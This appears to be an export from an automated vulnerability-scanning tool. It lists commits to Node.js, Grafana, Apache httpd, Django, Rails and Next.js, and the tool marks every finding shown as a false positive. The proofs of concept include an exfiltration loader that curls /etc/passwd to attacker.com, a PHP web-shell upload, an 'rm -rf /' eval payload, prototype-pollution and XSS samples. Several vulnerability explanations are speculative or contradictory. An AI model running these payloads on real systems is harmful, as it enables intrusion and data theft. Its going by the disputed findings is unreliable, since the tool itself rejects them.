β οΈ MEDIUM FALSE POSITIVE Prototype Pollution
May 4, 2026, 03:22 PM β nodejs/node
Commit: e0200f2d73ae0f112c32ff55ae4ab8af18106b5f
Author: Matteo Collina
Before the patch, `ObjectAssign(input || {}, options)` would merge options into the `input` object directly, and the resulting object retained its prototype chain. If a property like `hostname` was defined on `Object.prototype` by an attacker (prototype pollution), it could be read during the options merge/processing, potentially influencing HTTP request behavior such as redirecting requests to an attacker-controlled host. The fix uses `ObjectAssign({ __proto__: null }, input, options)` to create a null-prototype object, preventing prototype chain lookups from polluting the options object.
π View Affected Code & PoC
Affected Code
options = ObjectAssign(input || {}, options);
Proof of Concept
// Attacker pollutes Object.prototype with a malicious hostname
Object.prototype.hostname = 'evil.attacker.com';
// Now any http.request() call that goes through the else branch
// (i.e., when both input URL and options are provided) will pick up
// the polluted hostname if not explicitly set
const http = require('http');
http.request({ port: 80 }, (res) => {
// Request goes to evil.attacker.com:80 instead of intended host
console.log('Connected to:', res.socket.remoteAddress);
}).end();
// Before the patch, options.hostname resolves to 'evil.attacker.com'
// via prototype chain since input object inherits from Object.prototype
β οΈ MEDIUM FALSE POSITIVE Credential Exposure / Information Disclosure
Apr 29, 2026, 04:39 AM β grafana/grafana
Commit: f2d8737c86f9bbae018865a6db8e9f4730b672b1
Author: Alex Khomenko
Before this patch, Grafana's provisioning feature allowed users to save repository URLs containing embedded credentials (e.g., `https://user:[email protected]/owner/repo`). Since the URL field is not treated as a secret and is returned verbatim by the settings API, any authenticated user (including low-privilege Viewers) could read the credentials by querying the provisioning settings endpoint. The patch adds frontend validation that detects and blocks URLs with userinfo components (username/password) before they can be saved.
π View Affected Code & PoC
Affected Code
url: {
label: t('provisioning.shared.url-label', 'Repository URL'),
validation: {
pattern: {
value: /^https:\/\/[^\/]+\/[^\/]+\/[^\/]+\/?$/,
message: t('provisioning.shared.url-pattern', 'Must be a valid repository URL (https://hostname/owner/repo)'),
},
},
},
Proof of Concept
1. As an admin, configure a provisioning repository with URL: https://user:[email protected]/owner/repo 2. Save the configuration (no validation prevents this before the patch) 3. As any authenticated Viewer, call GET /apis/provisioning.grafana.app/v0alpha1/namespaces/default/repositories/<name> 4. The response includes the full URL verbatim: {"spec":{"github":{"url":"https://user:[email protected]/owner/repo",...}}} 5. The token ghp_secrettoken123 is now exposed to all authenticated users, while secure.token would have been redacted
β οΈ MEDIUM FALSE POSITIVE Integer Underflow / Slice Bounds Panic (Denial of Service)
Apr 28, 2026, 02:04 PM β grafana/grafana
Commit: baa428a6b4bf471301079df6ea43a44536ba3036
Author: Misi
Before the patch, the `/teams/{name}/members` handler parsed `offset` and `page` query parameters but did not clamp them to non-negative values. A negative `offset` value would cause a negative slice index when slicing `t.Spec.Members\[offset:end\]`, triggering a Go runtime panic and crashing the handler (or the server process, depending on recovery middleware). The patch adds explicit clamping of `offset` to `\[0, total\]` before slicing.
π View Affected Code & PoC
Affected Code
window := t.Spec.Members[offset:end] // offset can be negative from ?offset=-1
Proof of Concept
GET /apis/iam.grafana.app/v0alpha1/namespaces/default/teams/myteam/members?offset=-1 This sends a negative offset to the handler. Before the patch, `offset` would be -1, `end` would be (-1 + limit), and the slice expression `t.Spec.Members[-1:end]` would cause a Go runtime panic: 'runtime error: slice bounds out of range [-1:]', crashing the request handler.
β οΈ MEDIUM FALSE POSITIVE Null Pointer Dereference / Server Crash
Apr 26, 2026, 04:28 PM β apache/httpd
Commit: eecbbca65f3fd09cf0c1aee763bc26b46a46380e
Author: Eric Covener
In mod_authn_socache.c, the `construct_key` function called `strrchr(r->uri, '/')` without checking if the result was NULL before using it in pointer arithmetic. If `r->uri` contained no '/' character (an unusual but possible condition), `slash` would be NULL and the expression `slash - r->uri` would cause undefined behavior/crash. The patch moves the slash computation earlier and adds a NULL check (`&& slash`) before entering the branch that uses it.
π View Affected Code & PoC
Affected Code
if (!strcmp(context, directory)) {
/* FIXME: are we at risk of this blowing up? */
char *new_context;
char *slash = strrchr(r->uri, '/');
new_context = apr_palloc(r->pool, slash - r->uri +
Proof of Concept
Send a crafted HTTP request where r->uri contains no '/' character. In Apache's normal operation r->uri always starts with '/', but via certain internal redirect or sub-request mechanisms, or a crafted request, a URI without '/' could be constructed. When the authn_socache module processes authentication for a directory context with such a URI, slash==NULL, and `slash - r->uri` dereferences NULL causing a server crash (DoS). Example: configure AuthnCacheContext directory, then trigger an internal sub-request with a URI like 'nodirectoryslash' to crash the child process.
β οΈ MEDIUM FALSE POSITIVE Prototype Pollution
Apr 25, 2026, 09:28 AM β nodejs/node
Commit: 21436f04057b62b4ad7b3704dad73898c681cd1e
Author: Matteo Collina
Before the patch, `req.headers` and `req.trailers` in Node.js HTTP/HTTP2 IncomingMessage were plain objects (`{}`) with `Object.prototype` as their prototype. This allowed an attacker to send HTTP headers named `__proto__`, `constructor`, or `toString` that could pollute the prototype chain or shadow built-in properties when the headers object was used in certain ways. The patch fixes this by creating the headers object with a null prototype (`{ __proto__: null }`), preventing any prototype chain manipulation.
π View Affected Code & PoC
Affected Code
if (!this[kHeaders]) {
this[kHeaders] = {};
const src = this.rawHeaders;
const dst = this[kHeaders];
Proof of Concept
// Attacker sends HTTP request with __proto__ header:
// GET / HTTP/1.1\r\nHost: victim\r\n__proto__: polluted\r\n\r\n
//
// Server-side code that may be vulnerable:
const http = require('http');
http.createServer((req, res) => {
// Before patch: req.headers has Object.prototype
// A header named '__proto__' could be interpreted as prototype manipulation
// depending on how the object is used downstream
const headers = req.headers;
// If code does: Object.assign(target, req.headers)
// or: for (let k in req.headers) target[k] = req.headers[k]
// the __proto__ key could pollute target's prototype
const target = {};
Object.assign(target, headers); // __proto__ assignment pollutes Object.prototype
console.log(({}).polluted); // could output attacker-controlled value
res.end();
}).listen(8080);
β οΈ MEDIUM FALSE POSITIVE Prototype Pollution
Apr 23, 2026, 05:20 PM β nodejs/node
Commit: 800f5828dce64a16e2255315a0c29ea71c25d044
Author: Jonathan Lopes
The `nidOnlyKeyPairs` object in Node.js crypto's `generateKeyPair` was created as a regular object without a null prototype, allowing inherited properties from `Object.prototype` (like `toString`, `constructor`, `hasOwnProperty`, etc.) to be used as valid key type names. By passing a type name like `'toString'` or `'constructor'`, an attacker could bypass the intended key type validation and potentially trigger unexpected behavior in the NID-based key pair generation. The patch fixes this by setting `'__proto__': null` on the object, removing inherited properties from the lookup table.
π View Affected Code & PoC
Affected Code
const nidOnlyKeyPairs = {
'ed25519': EVP_PKEY_ED25519,
'ed448': EVP_PKEY_ED448,
'x25519': EVP_PKEY_X25519,
Proof of Concept
const { generateKeyPairSync } = require('crypto');
// Before the patch, 'toString' would be found in nidOnlyKeyPairs via prototype
// inheritance, causing NidKeyPairGenJob to be called with undefined NID value
// instead of throwing ERR_INVALID_ARG_VALUE
try {
generateKeyPairSync('toString', {});
console.log('No error thrown - vulnerability confirmed');
} catch (e) {
console.log('Error:', e.code); // Should be ERR_INVALID_ARG_VALUE but before patch may be different
}
β οΈ MEDIUM FALSE POSITIVE Server Error / Information disclosure via unhandled exception (HTTP 500 instead of 400)
Apr 22, 2026, 06:25 PM β django/django
Commit: dc467fdc3b5744cec71fab876c23a14013e2510b
Author: Dinesh
Before the patch, a maliciously crafted Content-Type header containing an RFC 2231 encoded parameter with an invalid encoding name (e.g., `charset*=BOGUSencoding''value`) would cause an unhandled LookupError in parse_header_parameters(), resulting in an HTTP 500 Internal Server Error instead of a proper HTTP 400 Bad Request. This crash could expose stack traces (if DEBUG=True) or indicate internal implementation details, and could be used for denial-of-service by causing unhandled exceptions in request parsing. The fix wraps the unquote call in a try/except to raise ValueError, which is then caught and re-raised as BadRequest (HTTP 400).
π View Affected Code & PoC
Affected Code
if has_encoding:
encoding, lang, value = value.split("'")
value = unquote(value, encoding=encoding)
Proof of Concept
Send an HTTP request with the following Content-Type header:
GET / HTTP/1.1
Host: example.com
Content-Type: text/plain; charset*=BOGUSencoding''%20
Before the patch, Django would raise an unhandled LookupError (unknown encoding: BOGUSencoding), resulting in HTTP 500. In DEBUG mode, this leaks a full stack trace. Script:
import requests
r = requests.get('http://localhost:8000/', headers={'Content-Type': "text/plain; charset*=BOGUSencoding''%20"})
print(r.status_code) # 500 before patch, 400 after patch
π₯ HIGH FALSE POSITIVE Credentials Transmitted Over Unencrypted Channel
Apr 20, 2026, 11:11 AM β grafana/grafana
Commit: ed46c962f394834b533faf6dea724e757e8da43f
Author: Robert Clarke
Before this patch, the `basicAuth` struct's `RequireTransportSecurity()` method always returned `true`, which should have prevented basic auth credentials from being sent over non-TLS (insecure) gRPC connections. However, this hardcoded `true` value actually caused a conflict: when connecting to a non-TLS endpoint (using `insecure.NewCredentials()`), gRPC would reject the connection because the per-RPC credentials demanded transport security but none was configured. The fix makes `requireTransportSecurity` match the actual TLS state (`secure` variable). The real security concern is the inverse scenario: if an attacker or misconfiguration causes basic auth credentials to be transmitted over a plaintext gRPC connection, the credentials (username/password encoded in Base64) would be exposed in transit.
π View Affected Code & PoC
Affected Code
func (c *basicAuth) RequireTransportSecurity() bool {
return true
}
Proof of Concept
Configure a Tempo datasource in Grafana with basic auth enabled and a non-TLS gRPC URL (e.g., grpc://tempo-host:9095). With RequireTransportSecurity() hardcoded to true, gRPC rejects the connection entirely. After the fix with requireTransportSecurity=false for non-TLS, the connection succeeds but credentials flow over plaintext. An attacker on the network path can capture the gRPC stream and decode the Authorization header: `echo 'dXNlcjpwYXNzd29yZA==' | base64 -d` => `user:password`, extracting the Tempo datasource credentials.
π₯ HIGH FALSE POSITIVE Improper Access Control / Authentication Bypass
Mar 18, 2026, 08:46 PM β apache/httpd
Commit: e8b5fdc083f38f0395c992e9e9c6a4749674acc5
Author: Rich Bowen
The original example configuration had 'Require all granted' at the Directory level, which grants unauthenticated access to all users by default. The LimitExcept block only required authentication for non-GET/POST/OPTIONS methods, but the outer 'Require all granted' could override authentication requirements depending on configuration context. The patch removes 'Require all granted' and replaces the LimitExcept approach with a RequireAny block that properly requires either the correct HTTP method OR an authenticated admin user, ensuring write operations require authentication.
π View Affected Code & PoC
Affected Code
<Directory "/usr/local/apache2/htdocs/foo">
Require all granted
Dav On
...
<LimitExcept GET POST OPTIONS>
Require user admin
</LimitExcept>
Proof of Concept
With the old config, an unauthenticated user could perform WebDAV write operations: `curl -X PUT http://example.com/foo/malicious.php -d '<?php system($_GET["cmd"]); ?>'` - The 'Require all granted' directive grants access to all users, and depending on Apache's authorization merging behavior, could allow unauthenticated PUT/DELETE/MKCOL requests to modify server files, potentially leading to remote code execution.
π₯ HIGH FALSE POSITIVE Authentication Bypass
Feb 24, 2026, 08:05 PM β grafana/grafana
Commit: f1b77b82db5b8f4a0a10db5fb013b39869db464d
Author: colin-stuart
The code allowed SAML authentication to create duplicate user_auth records for SCIM-provisioned users instead of updating existing ones. An attacker could exploit this by logging in via SAML with a SCIM user's credentials to create a new auth record with their own AuthID, potentially bypassing access controls or creating authentication confusion.
π View Affected Code & PoC
Affected Code
if identity.AuthenticatedBy == login.GenericOAuthModule {
query := &login.GetAuthInfoQuery{AuthModule: identity.AuthenticatedBy, UserId: usr.ID}
userAuth, err = s.authInfoService.GetAuthInfo(ctx, query)
Proof of Concept
1. SCIM provisions user with email '[email protected]' and creates user_auth record with empty AuthID 2. Attacker performs SAML login with same email '[email protected]' but different AuthID 'attacker-saml-id' 3. Code fails to find existing auth record by AuthID lookup, creates new user_auth record instead of updating existing one 4. Result: User now has two authentication methods - original SCIM provision + attacker's SAML AuthID, allowing potential unauthorized access
β οΈ MEDIUM FALSE POSITIVE Man-in-the-Middle Attack / Insufficient Certificate Validation
Feb 24, 2026, 09:32 AM β grafana/grafana
Commit: f13db6553c2037967bd87e215e1a12d38b8fe211
Author: Maksym Revutskyi
The code before the patch used HTTP transport without proper TLS certificate validation when communicating with external image renderer services. This allowed attackers to intercept HTTPS communications through man-in-the-middle attacks, potentially exposing authentication tokens and sensitive data. The patch adds support for custom CA certificates to enable proper certificate validation.
π View Affected Code & PoC
Affected Code
var netTransport = &http.Transport{
Proxy: http.ProxyFromEnvironment,
Dial: (&net.Dialer{
Timeout: 30 * time.Second,
}).Dial,
TLSHandshakeTimeout: 5 * time.Second,
}
Proof of Concept
1. Set up a malicious proxy/MITM tool like mitmproxy with a self-signed certificate 2. Configure network to route Grafana's image renderer traffic through the proxy 3. The original code would accept any certificate without validation, allowing interception of requests containing X-Auth-Token headers 4. Command: `mitmproxy -p 8080 --certs *=cert.pem` then configure Grafana to use renderer at https://malicious-renderer:8081 - the auth tokens would be captured in plaintext
β οΈ MEDIUM FALSE POSITIVE Information Disclosure
Feb 24, 2026, 09:19 AM β rails/rails
Commit: 508662256608a0efe9221d801c894e8bbe126145
Author: Jean Boussier
The custom inspect methods in various Rails classes exposed sensitive internal state including cryptographic keys, secrets, and other confidential data in debug output, logs, and error messages. The patch replaces custom inspect methods with a standardized approach that only shows safe instance variables, preventing accidental leakage of sensitive information.
π View Affected Code & PoC
Affected Code
def inspect # :nodoc:
"#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end
Proof of Concept
# In a Rails console or debug session: encryptor = ActiveSupport::MessageEncryptor.new(SecretKey.new) encryptor.inspect # Before patch: Would expose the secret key in the output # After patch: Only shows class name and object ID # Or in ActionCable connection: connection = ActionCable::Connection::Base.new(server, env) connection.inspect # Before patch: Could expose connection secrets, tokens, or session data # After patch: Only shows safe, filtered instance variables
β οΈ MEDIUM FALSE POSITIVE Information Disclosure
Feb 24, 2026, 09:07 AM β rails/rails
Commit: 4c0776608a2e8048093c80de192de4f446c4d1fa
Author: Mark Bastawros
The custom inspect methods in various Rails classes could potentially expose sensitive internal state or configuration data through debug output, error messages, or logs. The patch replaces these with a controlled inspection mechanism that only shows explicitly whitelisted instance variables.
π View Affected Code & PoC
Affected Code
def inspect # :nodoc:
"#<#{self.class.name}:#{'%#016x' % (object_id << 1)}>"
end
Proof of Concept
# In a Rails console or error handler: connection = ActionCable::Connection::Base.new(server, env) connection.instance_variable_set(:@secret_token, 'sensitive_data') puts connection.inspect # Before patch: Could expose @secret_token and other internals # After patch: Only shows basic object info without sensitive variables
β οΈ MEDIUM FALSE POSITIVE Race Condition
Feb 23, 2026, 04:36 PM β vercel/next.js
Commit: 45a8a82db5f701546300fc7478ccbe8776350dc0
Author: Tobias Koppers
The code had a concurrency bug where the follower's aggregation number was read without proper locking, allowing the inner-vs-follower classification decision to be made on stale data if the aggregation number changed concurrently. This could lead to incorrect task classification and potential data corruption in the aggregation system.
π View Affected Code & PoC
Affected Code
let follower_aggregation_number = get_aggregation_number(&follower); let should_be_follower = follower_aggregation_number < upper_aggregation_number;
Proof of Concept
Thread 1 reads follower's aggregation number (e.g., 10) and determines it should be a follower. Thread 2 concurrently updates the same follower's aggregation number to a higher value (e.g., 20). Thread 1 proceeds with the stale classification decision, incorrectly treating a node that should be an inner node as a follower, leading to incorrect aggregation graph structure and potential data corruption.
β οΈ MEDIUM FALSE POSITIVE Path Traversal
Feb 21, 2026, 04:06 AM β vercel/next.js
Commit: 632725b0ad714043737b28e0d7b4a5ee6b2fa9ec
Author: Sebastian "Sebbie" Silbermann
The script accepts user-provided file paths without validation and directly converts them to file URLs, allowing attackers to access arbitrary files on the system. The patch adds proper path handling using pathToFileURL() which normalizes paths and prevents directory traversal attacks.
π View Affected Code & PoC
Affected Code
if (version !== null && version.startsWith('/')) {
version = pathToFileURL(version).href
}
Proof of Concept
pnpm run sync-react --version "../../../etc/passwd" would allow reading system files outside the intended React checkout directory before the patch
β οΈ MEDIUM FALSE POSITIVE Cross-Site Scripting (XSS)
Feb 20, 2026, 02:43 PM β django/django
Commit: 283ea9e9e014adf0013c18700c36b98efa2f0aac
Author: SiHyunLee
The Django admin interface was vulnerable to XSS attacks when displaying model string representations that contained only whitespace or malicious scripts. The vulnerability occurred because whitespace-only strings were not properly sanitized before being rendered in HTML contexts, allowing attackers to inject malicious scripts through model __str__ methods.
π View Affected Code & PoC
Affected Code
obj_repr = format_html('<a href="{}">{}</a>', urlquote(obj_url), obj)
# Direct use of obj without sanitization
Proof of Concept
Create a Django model with a __str__ method that returns '<script>alert("XSS")</script>' or just whitespace followed by script tags. When viewing this object in the Django admin interface, the malicious script would execute in the browser due to improper escaping of the object representation in admin templates and breadcrumbs.
π₯ HIGH FALSE POSITIVE Authorization Bypass
Feb 20, 2026, 08:25 AM β grafana/grafana
Commit: 430abe78becc1996d2327e06d449aaad0ca80bc1
Author: Georges Chaudy
The old authorization system used deprecated Compile method which performed authorization checks item-by-item during iteration, potentially allowing unauthorized access to resources due to race conditions or incomplete authorization state. The patch replaces this with FilterAuthorized using BatchCheck which performs more robust batch authorization before returning results.
π View Affected Code & PoC
Affected Code
checker, _, err := s.access.Compile(ctx, user, claims.ListRequest{
Group: key.Group,
Resource: key.Resource,
Namespace: key.Namespace,
Verb: utils.VerbGet,
})
Proof of Concept
1. User with limited permissions makes concurrent List requests for resources they shouldn't access 2. During the item-by-item authorization check in the old code, if authorization state changes between checks or there's a race condition, some unauthorized items could pass through the checker 3. Attacker could potentially access resources in folders/namespaces they don't have permissions for by exploiting timing windows in the deprecated Compile authorization flow
β οΈ MEDIUM FALSE POSITIVE Prototype Pollution
Feb 19, 2026, 04:37 PM β facebook/react
Commit: f247ebaf44317ac6648b62f99ceaed1e4fc4dc01
Author: Tim Neutkens
The original code used JSON.parse with a reviver function that could potentially allow __proto__ property manipulation during RSC payload deserialization. The patch explicitly deletes __proto__ keys during the walking phase and moves away from the reviver approach to prevent prototype pollution attacks.
π View Affected Code & PoC
Affected Code
return JSON.parse(json, response._fromJSON); // where _fromJSON reviver processes all key-value pairs including __proto__
Proof of Concept
Send RSC payload with malicious JSON: {"__proto__": {"polluted": true, "isAdmin": true}} - this could pollute Object.prototype during the reviver processing before parseModelString filters are applied, potentially affecting application logic that checks object properties.
β οΈ MEDIUM FALSE POSITIVE Race Condition
Feb 19, 2026, 12:58 PM β grafana/grafana
Commit: b0d812f414a22201e95d9646894dc5563f729ed4
Author: Rafael Bortolon Paulovic
The code had a race condition vulnerability during database migrations where concurrent writes to legacy tables could occur during unified storage migrations in rolling upgrade scenarios. This could lead to data corruption or inconsistent state as multiple processes could simultaneously modify the same database tables without proper synchronization.
π View Affected Code & PoC
Affected Code
Resources: []migrations.ResourceInfo{
{GroupResource: folderGR, LockTable: "folder"},
{GroupResource: dashboardGR, LockTable: "dashboard"},
}
Proof of Concept
During a rolling upgrade, start a unified storage migration for dashboards while simultaneously having another Grafana instance write to the dashboard table. The race condition occurs when: 1) Migration process reads dashboard data from legacy tables, 2) Another instance modifies the same dashboard record, 3) Migration process writes to unified storage based on stale data, resulting in data loss or corruption of the dashboard modifications made in step 2.
β οΈ MEDIUM FALSE POSITIVE Information Disclosure
Feb 18, 2026, 10:33 PM β grafana/grafana
Commit: ba0f62a8dad160e0fdb2d7993fcb6c6d194f1d22
Author: beejeebus
The code exposed encrypted datasource secrets even when they were empty, potentially leaking secret metadata or encrypted empty values to unauthorized users. The patch fixes this by filtering out empty secrets before returning them in API responses.
π View Affected Code & PoC
Affected Code
return q.converter.AsDataSource(ds)
Proof of Concept
GET /api/datasources/{uid} - An attacker with read access could retrieve a datasource configuration and see references to all configured secret fields (even empty ones) in the SecureJsonData map, potentially revealing what secret fields are configured and their encrypted empty values, which could aid in further attacks or reveal system configuration details.
β οΈ MEDIUM FALSE POSITIVE Path Traversal
Feb 17, 2026, 05:58 PM β grafana/grafana
Commit: 193f6f1a50938d9fd91636dadaf00274989e5a58
Author: Costa Alexoglou
The script used relative paths without proper directory resolution, allowing an attacker to execute the script from a different working directory and cause certificates to be written to unintended locations. This could lead to certificate files being created in arbitrary directories or overwriting existing files.
π View Affected Code & PoC
Affected Code
rm -rf data/grafana-aggregator mkdir -p data/grafana-aggregator openssl req -nodes -new -x509 -keyout data/grafana-aggregator/ca.key
Proof of Concept
cd /tmp && /path/to/grafana/hack/make-aggregator-pki.sh - This would create certificates in /tmp/data/grafana-aggregator/ instead of the intended repo location, potentially overwriting files or bypassing access controls in the /tmp directory.
π₯ HIGH FALSE POSITIVE Authorization Bypass
Feb 17, 2026, 03:04 PM β grafana/grafana
Commit: aac8061faaff75f917338a326eaf8c3ce5d38342
Author: Tania
The code was performing namespace validation for all provider types, but the static provider (which serves local configuration) should not enforce namespace restrictions. This created an authorization bypass where users could access feature flags from other organizations by using the static provider endpoint with mismatched namespaces.
π View Affected Code & PoC
Affected Code
valid, ns := b.validateNamespace(r)
if !valid {
http.Error(w, namespaceMismatchMsg, http.StatusUnauthorized)
return
}
Proof of Concept
An attacker authenticated to org-1 could access feature flags intended for org-2 by making requests to the static provider endpoints (when providerType is not FeaturesServiceProviderType or OFREPProviderType) with org-2's namespace in the URL path, bypassing the namespace validation that should prevent cross-organization access.
β οΈ MEDIUM FALSE POSITIVE State Modification via Dry-Run Bypass
Feb 17, 2026, 12:03 PM β grafana/grafana
Commit: ccaf8685b47b1a291ed0b1945be83f1e8324d977
Author: Igor Suleymanov
The dual-writer storage system was not properly handling dry-run operations, allowing state modifications and side effects (like permission changes) to occur when they should only validate without making changes. This violates the dry-run contract where operations must be read-only.
π View Affected Code & PoC
Affected Code
// Before patch - no dry-run check in Create method
func (d *dualWriter) Create(ctx context.Context, in runtime.Object, createValidation rest.ValidateObjectFunc, options *metav1.CreateOptions) (runtime.Object, error) {
// ... proceeds to modify both legacy and unified storage even during dry-run
Proof of Concept
POST /api/v1/folders
Content-Type: application/json
Dry-Run: All
{"metadata":{"name":"test-folder"},"spec":{"title":"Test Folder"}}
# Before patch: This would create actual folder and modify permissions despite dry-run flag
# After patch: This only validates without side effects
π₯ HIGH FALSE POSITIVE Code Injection
Feb 16, 2026, 02:59 PM β nodejs/node
Commit: 4d867af6c5d4b47b240ae4050265eb806f36e61e
Author: Shelley Vohr
The code used eval() to parse configuration data, which allows arbitrary Python code execution if an attacker can control the node_builtin_shareable_builtins configuration value. The patch replaces eval() with json.loads() to safely parse JSON data.
π View Affected Code & PoC
Affected Code
eval(config['node_builtin_shareable_builtins'])
Proof of Concept
An attacker could set node_builtin_shareable_builtins to '__import__("os").system("rm -rf /")' which would execute arbitrary shell commands when eval() processes it during the build configuration generation.
β οΈ MEDIUM FALSE POSITIVE Query Injection
Feb 16, 2026, 12:14 PM β grafana/grafana
Commit: 9be63b169b8e9f07a8b05df5d9b901a06ec611a3
Author: Steve Simpson
The code added validation for alert label matchers to prevent query injection in LogQL queries. Before the patch, malicious label names or matcher types could be injected into the LogQL query string without proper validation, potentially allowing attackers to manipulate the query structure.
π View Affected Code & PoC
Affected Code
logql += fmt.Sprintf(` | alert_labels_%s %s %q`, matcher.Label, matcher.Type, matcher.Value)
Proof of Concept
POST request with Labels: [{"Type": "| json | drop", "Label": "severity", "Value": "critical"}] or Labels: [{"Type": "=", "Label": "test\" = \"injected\"", "Value": "value"}] to inject arbitrary LogQL operators and manipulate the query structure
β οΈ MEDIUM FALSE POSITIVE Resource Deletion Bypass
Feb 16, 2026, 07:36 AM β grafana/grafana
Commit: 3f6518806f8c58f91e8a1f6756deb42d1b09d22a
Author: Daniele Stefano Ferru
The code allowed updating Repository resources to remove all finalizers, which would cause immediate deletion without proper cleanup when the resource is later deleted. This bypasses the intended cleanup workflow and could lead to orphaned resources or incomplete cleanup operations.
π View Affected Code & PoC
Affected Code
if len(r.Finalizers) == 0 && a.GetOperation() == admission.Create {
r.Finalizers = []string{
RemoveOrphanResourcesFinalizer,
CleanFinalizer,
}
}
Proof of Concept
1. Create a Repository resource (finalizers are added automatically)
2. Update the Repository with an empty finalizers array: `kubectl patch repository myrepo --type='merge' -p='{"metadata":{"finalizers":[]}}'`
3. Delete the Repository: `kubectl delete repository myrepo`
4. The resource is immediately deleted without cleanup, bypassing the controller's cleanup logic and potentially leaving orphaned resources
β οΈ MEDIUM FALSE POSITIVE Data Integrity Violation
Feb 14, 2026, 08:50 AM β rails/rails
Commit: 97cda8c49a2ffb5eea15a80ec99ada41c2b0df36
Author: Jean Boussier
The vulnerability allows silent data corruption where regular columns can be incorrectly deduplicated with virtual columns, causing INSERT and UPDATE statements to exclude legitimate columns and store NULL values instead of the intended data. This occurs when the deduplication registry encounters a virtual column first, then treats a regular column with the same name and type as identical.
π View Affected Code & PoC
Affected Code
def ==(other)
other.is_a?(Column) &&
super &&
auto_increment? == other.auto_increment?
end
Proof of Concept
1. Create a table with a virtual column named 'status' 2. Access the virtual column to register it in deduplication cache 3. Create another table with a regular column named 'status' 4. Attempt to insert data: User.create!(status: 'active') 5. The status field will be NULL in database instead of 'active' because the regular column was deduplicated to the virtual column and excluded from the INSERT statement
β οΈ MEDIUM FALSE POSITIVE Data Integrity Violation
Feb 14, 2026, 08:50 AM β rails/rails
Commit: 1a4305dfd0ba24e8d7b2fe17dfc8b60818437468
Author: Joshua Huber
The Deduplicable module incorrectly treated virtual (generated) columns and regular columns as identical when they had the same name and type, causing regular columns to be silently excluded from INSERT/UPDATE operations. This resulted in NULL values being stored instead of the intended data, leading to silent data corruption.
π View Affected Code & PoC
Affected Code
def ==(other)
other.is_a?(Column) &&
super &&
auto_increment? == other.auto_increment?
end
Proof of Concept
1. Create a table with a virtual column named 'name' 2. Create another table with a regular column named 'name' of same type 3. Access virtual column first to register it in deduplication cache 4. Attempt INSERT on regular table: MyModel.create!(name: 'test_data') 5. The 'name' field will be NULL in database instead of 'test_data' due to column deduplication treating regular column as virtual
π£ CRITICAL FALSE POSITIVE Code Injection
Feb 13, 2026, 06:45 PM β vercel/next.js
Commit: 740d55cdcefe5e62a2e0f6d65cd543d4b24423cc
Author: Tobias Koppers
The feature allows arbitrary webpack loader execution through import attributes without proper validation or sandboxing. An attacker can specify malicious loader code that gets executed during the build process, potentially leading to remote code execution on the build server.
π View Affected Code & PoC
Affected Code
import value from '../data.js' with { turbopackLoader: 'malicious-loader', turbopackLoaderOptions: '{"cmd":"rm -rf /"}' }
Proof of Concept
Create a malicious loader at node_modules/malicious-loader/index.js:
`β`β`βjs
module.exports = function(source) {
const { exec } = require('child_process');
exec('curl -X POST -d "$(cat /etc/passwd)" http://attacker.com/exfil');
return source;
}
`β`β`β
Then use: `import data from './file.txt' with { turbopackLoader: 'malicious-loader' }` to execute arbitrary commands during build time.
π₯ HIGH FALSE POSITIVE Authorization Bypass
Feb 13, 2026, 06:25 PM β grafana/grafana
Commit: 74d146aa370c1cbaf1a9e701389c0bc0d55e4794
Author: Mihai Turdean
The MT IAM API server was using a no-op storage backend for RoleBindings, which silently dropped all write operations and returned empty results for reads. Additionally, the authorizer denied all access to rolebindings. This created an authorization bypass where RBAC role bindings were completely non-functional, potentially allowing unauthorized access or preventing proper access controls from being enforced.
π View Affected Code & PoC
Affected Code
roleBindingsStorage: noopstorage.ProvideStorageBackend(), // TODO: add a proper storage backend ... return authorizer.DecisionDeny, "access denied", nil
Proof of Concept
POST /apis/iam.grafana.app/v0alpha1/rolebindings with body: {"apiVersion":"iam.grafana.app/v0alpha1","kind":"RoleBinding","metadata":{"name":"admin-binding"},"subjects":[{"kind":"User","name":"attacker"}],"roleRef":{"kind":"Role","name":"admin"}} - This request would be silently dropped by noopstorage, never creating the intended role binding, while appearing to succeed to the caller.
β οΈ MEDIUM FALSE POSITIVE Information Disclosure
Feb 12, 2026, 10:28 PM β grafana/grafana
Commit: 14ee584465b427a1419e4fb21555a5be42fffa22
Author: Tom Ratcliffe
The code previously only allowed admin users to see team folder owners, but the patch changes this to allow any user with 'teams:read' permission to see folder owners. This creates an information disclosure vulnerability where users with lower privileges can access team ownership information they shouldn't be able to see.
π View Affected Code & PoC
Affected Code
const isAdmin = contextSrv.hasRole('Admin') || contextSrv.isGrafanaAdmin;
{isAdmin && config.featureToggles.teamFolders && folderDTO && 'ownerReferences' in folderDTO && (
<FolderOwners ownerReferences={folderDTO.ownerReferences} />
)}
Proof of Concept
1. Create a user account without admin privileges but with 'teams:read' permission 2. Navigate to a team folder that has owner references 3. Before patch: Owner information is hidden 4. After patch: Owner information is now visible, disclosing team membership and folder ownership data that was previously restricted to admins only
β οΈ MEDIUM FALSE POSITIVE Race Condition / Optimistic Locking Bypass
Feb 12, 2026, 05:34 PM β grafana/grafana
Commit: 57b75b4a3b9ea631f957bf86db01de672a17d2b5
Author: Will Assis
The code had a race condition in optimistic locking implementation where concurrent operations could bypass resource version checks. The original implementation would rollback changes after transaction commit, creating a window where conflicting writes could succeed simultaneously. The patch fixes this by performing conflict detection during the transaction using proper WHERE clauses with resource version constraints.
π View Affected Code & PoC
Affected Code
DELETE FROM resource WHERE group = ? AND resource = ? AND namespace = ? AND name = ?; -- Missing resource_version check in WHERE clause
Proof of Concept
1. Client A reads resource with RV=100 2. Client B reads same resource with RV=100 3. Client A updates resource (RV becomes 101) 4. Client B deletes resource using old RV=100 5. Both operations succeed due to missing RV constraint in DELETE/UPDATE queries, allowing Client B to delete a resource that was modified after they read it, violating optimistic concurrency control
β οΈ MEDIUM FALSE POSITIVE Integer Overflow / Denial of Service
Feb 9, 2026, 10:38 PM β vercel/next.js
Commit: 9a2113cb9b9d93719f94372814193170335b87ed
Author: Luke Sandberg
The code incorrectly used max() instead of min() to clamp worker counts, causing all systems to be treated as having 64+ cores and potentially overflowing usize on systems with many actual cores. This could lead to memory exhaustion or application crashes.
π View Affected Code & PoC
Affected Code
let num_workers = num_workers.max(64); (num_workers * num_workers * 16).next_power_of_two()
Proof of Concept
On a system with a large number of cores (e.g., 10000), the calculation becomes: (10000 * 10000 * 16).next_power_of_two() = 1,600,000,000.next_power_of_two() = 2,147,483,648, which exceeds usize limits on 32-bit systems and causes massive memory allocation attempts leading to DoS.
β οΈ MEDIUM FALSE POSITIVE Denial of Service
Feb 8, 2026, 07:14 PM β facebook/react
